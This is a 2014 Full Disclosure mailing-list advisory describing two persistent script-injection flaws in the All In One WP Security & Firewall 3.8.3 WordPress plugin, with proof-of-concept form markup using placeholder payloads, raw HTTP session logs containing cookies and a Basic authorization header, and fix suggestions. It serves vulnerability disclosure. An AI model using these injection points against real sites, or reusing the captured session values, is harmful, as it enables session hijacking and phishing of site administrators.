[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 30 Sep 2014 16:39:46 +0200
Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
Release Date:
=============
2014-09-29
Vulnerability Laboratory ID (VL-ID):
====================================
1327
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra
security and firewall to your site by using a
security plugin that enforces a lot of good security practices. The All In One
WordPress Security plugin will take your website
security to a whole new level. This plugin is designed and written by experts
and is easy to use and understand. It reduces
security risk by checking for vulnerabilities, and by implementing and
enforcing the latest recommended WordPress security
practices and techniques.
(Copy of the Vendor Homepage:
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent
vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress
Plugin.
Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Two POST inject web vulnerabilities has been discovered in the official All in
One WP Security and Firewall v3.8.3 Plugin.
The vulnerability allows remote attackers to inject own malicious script codes
to the application-side of the vulnerable service.
The first vulnerability is located in the 404 detection redirect url input
field of the firewall detection 404 application module.
Remote attackers are able to prepare malicious requests that inject own script
codes to the application-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the
issue location on the application-side (persistent).
The attacker injects own script codes to the 404 detection redirect url input
field and the execution occurs in the same section
next to the input field context that gets displayed again.
The second vulnerability is location in the file name error logs url input
field of the FileSystem Components > Host System Logs module.
Remote attackers are able to prepare malicious requests that inject own script
codes to the applicaation-side of the vulnerable service.
The request method to inject is POST and the attack vector that exploits the
issue location on the application-side (persistent).
The attacker injects own script codes to the file name error logs url input
field and the execution occurs in the same section
next to the input field context that gets displayed again.
The security risk of the persistent POST inject vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires no privileged
web-application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing
attacks, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module
context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Vulnerable Parameter(s):
[+] 404 detection redirect url
[+] file name error logs url
Affected Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers
without privileged application user account and with low or
medium user interaction. For security demonstration or to reproduce the
security vulnerability follow the provided information and
steps below to continue.
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
<tr valign="top">
<th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url"
value="http://127.0.0.1\";
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED
SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
<span class="description">A blocked visitor will be
automatically redirected to this URL.</span>
</td>
</tr>
</table>
<input type="submit" name="aiowps_save_404_detect_options" value="Save
Settings" class="button-primary" />
</form>
</div></div>
<div class="postbox">
<h3><label for="title">404 Event Logs</label></h3>
<div class="inside">
<form id="tables-filter" method="post">
<!-- For plugins, we also need to ensure that the form posts back
to our current page -->
<input type="hidden" name="page" value="aiowpsec_firewall" />
<input type="hidden" name="tab" value="tab6" />
<!-- Now we can render the completed list table -->
<input type="hidden" id="_wpnonce" name="_wpnonce"
value="054474276c" /><input type="hidden" name="_wp_http_referer"
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div
class="tablenav top">
<div class="alignleft actions">
<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply"
onClick="return confirm("Are you sure you want to perform this bulk operation
on the selected entries?")" />
</div>
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the
first page'
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
<a class='prev-page disabled' title='Go to the previous page'
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page'
type='text' name='paged' value='1' size='1' /> of <span
class='total-pages'>0</span></span>
<a class='next-page' title='Go to the next page'
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page'
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
<br class="clear" />
</div>
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST
http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des
Inhalts[8095] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101
Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b;
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1;
wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:21 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[8095]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT
INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load
Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101
Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b;
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1;
wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:22 GMT]
Content-Type[text/html]
Content-Length[557]
Connection[keep-alive]
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
Etag["4ea065b-3c6-4dcad48e5901e"]
Accept-Ranges[bytes]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Powered-By[PleskLin]
Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout
Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
1.2
The second POST inject web vulnerability can be exploited by remote attackers
without privileged application user account and with low or medium
user interaction. For security demonstration or to reproduce the security
vulnerability follow the provided information and steps below to continue.
PoC: FileSystem Components > Host System Logs
<div class="inside">
<p>Please click the button below to view the latest system logs:</p>
<form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer"
value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
<div>Enter System Log File Name:
<input size="25" name="aiowps_system_log_file"
value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
<span class="description">Enter your system log file name.
(Defaults to error_log)</span>
</div>
<div class="aio_spacer_15"></div>
<input name="aiowps_search_error_files" value="View Latest
System Logs" class="button-primary search-error-files" type="submit">
<span style="display: none;" class="aiowps_loading_1">
<img
src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif";
alt="">
</span>
</form>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load
Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime
Type[application/json]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101
Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Content-Length[109]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b;
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1;
wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
interval[60]
_nonce[176fea481c]
action[heartbeat]
screen_id[wp-security_page_aiowpsec_filesystem]
has_focus[false]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:44 GMT]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Robots-Tag[noindex]
x-content-type-options[nosniff]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Status: 200[OK]
GET
http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des
Inhalts[6136] Mime Type[text/html]
Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101
Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b;
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1;
wp-settings-time-1=1411750846]
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:54 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[6136]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File
Name input context in the file system security module.
The second issue can be patched by a secure encode and parse of the 404 Lockout
Redirect URL input context in the firewall 404 detection module.
Restrit the input and handle malicious context with a own secure eception
handling to prevent further POSt injection attacks.
Security Risk:
==============
The security risk of the POSt inject web vulnerabilities in the firewall module
are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of
such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade
with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: dev.vulnerability-db.com - forum.vulnerability-db.com
- magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a
permission.
Copyright © 2014 | Vulnerability Laboratory
[Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/